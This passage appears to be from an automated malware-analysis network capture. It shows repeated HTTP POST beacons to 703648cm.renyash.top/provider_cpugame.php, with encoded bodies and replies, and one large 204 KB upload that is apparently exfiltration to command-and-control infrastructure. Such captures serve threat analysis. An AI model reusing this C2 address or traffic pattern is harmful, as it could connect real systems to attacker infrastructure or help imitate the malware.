                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 55 37 3b 29 0d 33 3c 25 52 28 0d 09 1f 31 06 20 1d 3b 09 2d 05 26 2e 25 1a 3f 3b 0b 0b 3e 55 39 5a 26 33 07 1f 24 3d 05 10 25 34 2b 51 03 10 21 05 25 13 2a 5e 33 06 28 54 33 0d 3c 1b 22 3e 24 0a 36 30 22 1c 21 3a 3d 54 24 00 0b 56 3e 07 07 5e 3d 1a 30 5a 2a 31 2c 01 2a 2d 20 52 09 16 26 50 29 01 24 1c 24 3b 20 1d 2b 13 0a 5c 32 38 29 18 3e 3e 21 0e 3f 3e 3f 0e 3e 2c 23 08 25 23 36 58 3d 3a 0b 16 31 3a 23 0b 26 38 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %U7;)3<%R(1 ;-&.%?;>U9Z&3$=%4+Q!%*^3(T3<">$60"!:=T$V>^=0Z*1,*- R&P)$$; +\28)>>!?>?>,#%#6X=:1:#&8&P#-U=VW
                                                                                                                      Dec 20, 2024 21:17:44.071722984 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:44.478060007 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:45.194128990 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:43 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 1f 20 5d 21 0c 24 01 21 50 28 20 33 55 26 2f 30 18 3b 30 3e 59 24 3e 25 17 3c 05 0f 0f 3f 30 25 10 24 33 2e 0d 24 3e 3b 1f 24 24 2b 51 03 10 22 58 26 5b 3a 58 26 2f 23 0e 24 33 2b 07 21 00 2c 41 35 33 31 09 37 07 29 1e 33 58 22 09 3d 29 0f 5e 29 34 02 18 3c 08 2b 5e 3d 17 20 52 09 16 25 0e 2a 16 28 1e 24 38 38 1f 2b 13 23 01 32 06 0f 53 29 3e 32 56 3c 00 0d 0a 2a 11 19 09 26 20 03 03 2a 29 3a 05 32 03 3c 14 33 02 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: % ]!$!P( 3U&/0;0>Y$>%<?0%$3.$>;$$+Q"X&[:X&/#$3+!,A5317)3X"=)^)4<+^= R%*($88+#2S)>2V<*& *):2<3&P#-U=VW
                                                                                                                      Dec 20, 2024 21:17:45.195405006 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:45.611955881 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:46.320272923 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:44 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 53 23 15 0f 0d 24 3c 21 57 28 55 27 1d 25 06 3b 09 3b 0e 22 14 31 3d 26 06 2a 28 21 09 3e 0a 26 00 25 1d 29 56 27 3d 34 0c 25 0e 2b 51 03 10 21 07 24 2d 00 5e 30 06 3f 0c 30 0d 30 1b 22 2d 24 08 21 0a 3a 55 23 3a 3a 0e 25 2e 21 50 29 29 3e 07 29 37 3c 18 2b 57 2b 15 3e 2d 20 52 09 16 26 1f 2a 01 3f 08 24 28 20 1d 3f 5b 20 15 24 3b 29 56 2a 3d 32 1e 3c 10 3c 55 3d 11 20 50 26 30 22 10 3d 3a 07 19 31 04 05 0b 33 28 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %S#$<!W(U'%;;"1=&*(!>&%)V'=4%+Q!$-^0?00"-$!:U#::%.!P))>)7<+W+>- R&*?$( ?[ $;)V*=2<<U= P&0"=:13(&P#-U=VW
                                                                                                                      Dec 20, 2024 21:17:46.321068048 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:46.728540897 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:47.447422028 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:45 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 26 0b 23 15 2e 57 24 01 26 0a 28 0d 05 1d 25 06 3b 43 2e 20 26 59 31 3d 36 06 2b 05 0b 0f 29 1d 26 03 25 0d 21 54 24 2d 23 10 31 34 2b 51 03 10 21 00 26 2d 3a 59 27 3f 09 0f 24 23 0e 5d 35 3d 20 09 21 30 2e 51 23 29 2d 10 27 58 39 57 2a 07 22 03 2b 34 28 5d 3f 08 2f 1b 3f 2d 20 52 09 16 26 57 2a 38 34 54 24 01 37 0e 2b 03 3f 05 25 3b 2d 50 29 04 3e 10 2b 10 24 52 29 59 34 50 26 20 00 5b 3e 5c 29 14 32 5c 3c 56 33 28 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: &#.W$&(%;C. &Y1=6+)&%!T$-#14+Q!&-:Y'?$#]5= !0.Q#)-'X9W*"+4(]?/?- R&W*84T$7+?%;-P)>+$R)Y4P& [>\)2\<V3(&P#-U=VW
                                                                                                                      Dec 20, 2024 21:17:47.448950052 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2192
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:47.855350018 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:48.599931955 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:46 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 26 0d 23 38 3d 0f 33 2f 0f 53 3c 0d 37 1d 32 01 33 08 2c 0e 2d 07 26 2e 14 05 28 5d 2d 0e 29 1d 31 58 25 1d 0f 52 30 03 3b 10 26 24 2b 51 03 10 22 58 26 13 2d 03 30 59 28 1e 24 0d 33 06 35 3d 3c 43 23 23 08 13 34 3a 39 57 33 3d 26 09 3d 07 07 1d 2a 1a 06 5a 2a 21 06 07 3e 17 20 52 09 16 26 57 3d 28 1a 54 33 01 38 57 3c 3d 0e 15 26 16 36 0f 29 13 21 0c 2b 07 20 53 29 59 20 51 26 30 32 5a 29 5c 39 5c 24 3a 37 08 27 02 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: &#8=3/S<723,-&.(]-)1X%R0;&$+Q"X&-0Y($35=<C##4:9W3=&=*Z*!> R&W=(T38W<=&6)!+ S)Y Q&02Z)\9\$:7'&P#-U=VW
                                                                                                                      Dec 20, 2024 21:17:48.614167929 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:49.020700932 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:49.740283012 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:47 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 26 0e 34 05 35 0d 24 3c 21 18 29 33 3b 56 26 3f 3b 44 2f 20 2e 5e 32 00 26 07 3f 05 2e 1b 3d 1d 2a 06 24 33 0f 57 24 03 20 0c 32 34 2b 51 03 10 21 04 24 2d 22 5b 33 2c 28 57 30 1d 0d 01 35 2e 3f 1b 23 20 21 0d 21 29 2a 0e 24 3e 39 51 29 17 3d 5b 2b 34 09 03 3c 1f 0e 00 3f 2d 20 52 09 16 26 50 29 3b 38 51 30 28 05 0f 29 2d 2b 06 26 01 36 0e 28 2e 31 0d 2b 3d 33 0e 29 11 38 1b 31 33 3e 58 3e 04 26 03 26 39 24 50 26 38 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: &45$<!)3;V&?;D/ .^2&?.=*$3W$ 24+Q!$-"[3,(W05.?# !!)*$>9Q)=[+4<?- R&P);8Q0()-+&6(.1+=3)813>X>&&9$P&8&P#-U=VW
                                                                                                                      Dec 20, 2024 21:17:49.740638018 CET290OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 204424
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:50.148314953 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:51.449246883 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:49 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[
                                                                                                                      Dec 20, 2024 21:17:51.449758053 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2204
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:51.856368065 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:52.586940050 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:50 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 26 0e 23 38 32 55 27 3f 3e 0b 2b 20 2f 56 32 3f 24 1a 2c 56 2d 01 31 00 3d 14 28 05 32 56 3d 23 0f 1d 26 0d 08 0d 33 3d 38 0e 32 0e 2b 51 03 10 21 01 32 03 00 5a 24 11 0d 0a 26 23 33 06 21 07 34 42 36 23 2e 1c 23 29 3d 1f 24 2e 25 53 3e 5f 35 10 2a 34 2f 05 28 0f 27 5d 3e 2d 20 52 09 16 26 1c 2a 38 12 1d 30 38 2f 0c 29 3d 20 14 24 2b 29 57 3d 3d 03 0d 2b 2e 38 56 29 01 33 0f 31 0e 2e 58 2a 2a 21 5e 32 14 20 50 24 28 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: &#82U'?>+ /V2?$,V-1=(2V=#&3=82+Q!2Z$&#3!4B6#.#)=$.%S>_5*4/(']>- R&*808/)= $+)W==+.8V)31.X**!^2 P$(&P#-U=VW
                                                                                                                      Dec 20, 2024 21:17:52.587888956 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:52.995208025 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:53.714708090 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:51 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 1f 21 38 3e 11 24 59 2e 08 2b 0a 27 1c 31 3f 24 1d 2c 30 0c 59 25 3e 1b 17 3c 3b 00 57 3d 30 3e 07 32 1d 35 55 24 3d 38 0f 32 34 2b 51 03 10 22 59 32 3d 32 13 24 59 2b 0d 27 30 33 07 21 00 09 18 36 23 2e 1d 23 29 0b 1d 33 10 2e 08 3d 3a 2d 5e 29 1a 20 18 3c 57 30 01 3e 07 20 52 09 16 26 12 29 06 16 55 27 16 37 09 28 3d 2c 1a 25 06 29 50 3d 2d 0c 55 3c 10 0e 1f 2a 01 16 56 26 0e 04 10 28 3a 36 03 32 04 34 56 27 02 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %!8>$Y.+'1?$,0Y%><;W=0>25U$=824+Q"Y2=2$Y+'03!6#.#)3.=:-^) <W0> R&)U'7(=,%)P=-U<*V&(:624V'&P#-U=VW
                                                                                                                      Dec 20, 2024 21:17:53.715536118 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:54.122093916 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:54.842910051 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:53 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 54 34 38 3e 57 27 2f 04 0f 3c 33 0a 09 26 11 27 41 2c 23 29 06 31 2d 36 04 28 5d 32 52 29 0a 39 10 31 33 0c 0e 27 5b 2f 52 31 0e 2b 51 03 10 21 01 26 2d 07 00 24 01 06 53 27 33 0e 1b 22 00 28 42 22 30 2e 13 34 39 29 56 27 2e 0b 56 29 07 29 1d 29 1d 34 5d 3c 08 3b 14 3f 3d 20 52 09 16 26 51 2a 01 34 56 24 16 20 54 2b 2d 23 04 24 28 08 0f 3e 13 36 55 28 10 20 56 3d 11 3c 50 25 30 26 1e 2a 03 35 19 25 03 3b 08 26 28 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %T48>W'/<3&'A,#)1-6(]2R)913'[/R1+Q!&-$S'3"(B"0.49)V'.V)))4]<;?= R&Q*4V$ T+-#$(>6U( V=<P%0&*5%;&(&P#-U=VW
                                                                                                                      Dec 20, 2024 21:17:54.847480059 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:55.254381895 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:55.983545065 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:54 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 53 20 38 21 0d 27 01 0f 51 3f 33 01 51 25 3f 24 1d 38 56 32 5d 31 3d 29 5d 2b 15 04 15 3f 33 0b 58 26 0a 31 54 25 2e 2c 0e 25 24 2b 51 03 10 22 59 31 03 26 13 30 01 02 1e 30 33 28 5e 20 3e 0a 42 23 23 0f 08 21 2a 39 54 33 07 39 51 29 29 2d 5e 3e 37 20 16 3f 0f 05 5d 3d 07 20 52 09 16 26 50 28 2b 27 09 25 28 24 51 28 13 28 5c 32 3b 3d 56 2a 13 21 0c 28 2e 20 10 3e 3c 24 51 31 0e 2e 11 28 29 3d 5e 32 3a 28 57 27 02 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %S 8!'Q?3Q%?$8V2]1=)]+?3X&1T%.,%$+Q"Y1&003(^ >B##!*9T39Q))-^>7 ?]= R&P(+'%($Q((\2;=V*!(. ><$Q1.()=^2:(W'&P#-U=VW
                                                                                                                      Dec 20, 2024 21:17:55.984600067 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:56.391587973 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:57.116878986 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:55 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 26 0f 23 5d 3d 0a 30 06 2d 51 2b 0a 2b 51 32 01 09 42 38 1e 25 04 32 07 25 5e 28 02 21 0f 3d 33 2d 5f 25 0d 31 1e 24 3d 0a 0c 25 24 2b 51 03 10 22 16 31 3d 08 10 33 3c 3f 0f 24 20 2f 06 35 07 24 42 35 1d 2a 54 21 39 0b 57 25 2e 21 56 28 39 35 5b 3d 24 2f 06 2b 22 2c 07 3e 3d 20 52 09 16 26 50 3e 38 33 0d 33 06 05 0f 3c 04 20 17 26 01 2a 0e 2a 2d 21 0f 28 00 0a 10 2a 3c 38 57 24 23 22 5c 2a 04 2d 5b 25 14 24 19 30 38 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: &#]=0-Q++Q2B8%2%^(!=3-_%1$=%$+Q"1=3<?$ /5$B5*T!9W%.!V(95[=$/+",>= R&P>833< &**-!(*<8W$#"\*-[%$08&P#-U=VW
                                                                                                                      Dec 20, 2024 21:17:57.117763042 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:57.525409937 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:57.950368881 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:56 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 52 37 15 00 1e 30 59 3a 0b 2b 1d 28 0c 32 3f 33 08 2c 1e 31 04 32 07 39 58 3f 05 29 0f 3f 23 0f 10 24 30 32 0b 27 03 01 55 32 1e 2b 51 03 10 22 5d 31 03 0f 07 24 11 3f 0c 30 1d 27 05 21 10 2c 0a 36 0d 0c 1e 34 2a 26 0f 24 00 21 1b 3d 39 26 07 29 24 37 05 2b 21 05 5c 3f 2d 20 52 09 16 25 09 28 28 34 54 33 38 3b 0e 2b 03 20 15 32 01 2d 52 3e 5b 3d 0e 2b 3d 24 1d 3d 11 30 56 25 1e 04 5b 2a 04 0f 5c 26 03 3f 09 27 02 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %R70Y:+(2?3,129X?)?#$02'U2+Q"]1$?0'!,64*&$!=9&)$7+!\?- R%((4T38;+ 2-R>[=+=$=0V%[*\&?'&P#-U=VW
                                                                                                                      Dec 20, 2024 21:17:57.951922894 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:58.358438015 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:59.079356909 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:57 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 26 0b 37 15 00 1e 24 01 26 0b 2b 30 27 55 24 3c 33 08 3b 33 35 05 25 00 3a 01 28 3b 00 15 3e 20 2d 13 25 0d 3d 1e 33 5b 24 0e 25 1e 2b 51 03 10 22 15 31 03 26 5e 27 3f 28 57 30 1d 0a 5c 35 00 37 1b 21 33 3a 55 20 3a 2a 0e 27 00 25 1b 3e 07 31 12 3e 34 01 05 2b 1f 2b 5c 3d 17 20 52 09 16 26 1d 29 5e 37 08 33 06 23 0f 2b 13 3c 5f 25 06 36 0a 29 3d 3d 0f 3f 00 3b 0a 3e 01 20 57 25 56 21 02 29 03 22 04 26 5c 3b 09 27 28 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: &7$&+0'U$<3;35%:(;> -%=3[$%+Q"1&^'?(W0\57!3:U :*'%>1>4++\= R&)^73#+<_%6)==?;> W%V!)"&\;'(&P#-U=VW
                                                                                                                      Dec 20, 2024 21:17:59.082902908 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2192
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:59.489970922 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:00.213094950 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:58 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 26 0a 23 05 00 1c 30 06 3d 1b 29 30 33 51 31 3f 3c 1c 2f 1e 22 5c 31 07 25 14 3c 38 29 0e 3e 1d 3e 06 24 33 0c 0b 30 2d 3b 55 26 34 2b 51 03 10 22 5f 25 3d 00 5a 27 01 0d 0f 30 33 01 01 21 3d 20 40 21 0a 2d 0c 23 2a 3d 53 24 07 39 18 3e 00 35 1d 2a 1d 30 5d 3c 0f 30 01 3d 17 20 52 09 16 26 50 29 01 20 1e 24 28 3b 0e 28 5b 30 17 26 01 2d 1b 3e 04 3e 55 2b 10 28 54 2a 2c 24 53 26 09 2e 5c 2a 04 3d 5e 26 3a 06 52 27 28 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: &#0=)03Q1?</"\1%<8)>>$30-;U&4+Q"_%=Z'03!= @!-#*=S$9>5*0]<0= R&P) $(;([0&->>U+(T*,$S&.\*=^&:R'(&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:00.214010954 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:00.620850086 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:01.343547106 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:59 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 56 21 28 35 0a 24 01 3a 0f 28 0d 2b 57 26 11 38 19 2c 1e 0c 14 26 58 36 04 2b 3b 0b 0b 3d 0d 0b 59 32 1d 00 0f 30 3e 2b 1e 24 24 2b 51 03 10 22 58 26 2d 3a 10 24 59 20 52 27 0a 27 04 22 2e 37 1d 21 0a 3e 1d 20 07 35 10 33 07 25 51 29 07 21 5e 2a 34 2f 07 28 57 2b 59 2a 3d 20 52 09 16 26 1d 3d 01 2b 0d 24 28 06 55 3c 3e 27 01 32 16 3d 57 3d 2e 3e 1d 3c 00 2c 55 2a 59 20 57 32 0e 04 10 29 3a 35 5e 25 04 24 19 26 28 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %V!(5$:(+W&8,&X6+;=Y20>+$$+Q"X&-:$Y R''".7!> 53%Q)!^*4/(W+Y*= R&=+$(U<>'2=W=.><,U*Y W2):5^%$&(&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:01.344772100 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:01.751668930 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:02.471388102 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:00 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 26 0a 20 3b 36 52 24 59 25 15 3c 33 2f 57 32 3f 23 09 2f 09 29 07 26 3d 36 01 2b 28 36 52 3d 1d 29 13 25 55 22 0d 27 3e 27 57 32 0e 2b 51 03 10 22 16 31 2d 3a 5b 24 11 23 0a 30 0d 20 16 22 2d 3b 1c 23 30 3d 0e 20 5f 3e 0d 24 07 21 50 3e 39 00 00 3e 24 2c 5f 3c 08 2b 14 3e 17 20 52 09 16 26 57 3e 06 28 55 33 01 3f 09 29 3d 33 01 26 28 0f 52 28 3d 04 52 2b 2e 2b 0e 2a 3c 34 57 32 1e 26 10 3d 04 2e 06 32 14 2c 19 30 02 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: & ;6R$Y%<3/W2?#/)&=6+(6R=)%U"'>'W2+Q"1-:[$#0 "-;#0= _>$!P>9>$,_<+> R&W>(U3?)=3&(R(=R+.+*<4W2&=.2,0&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:02.472234011 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
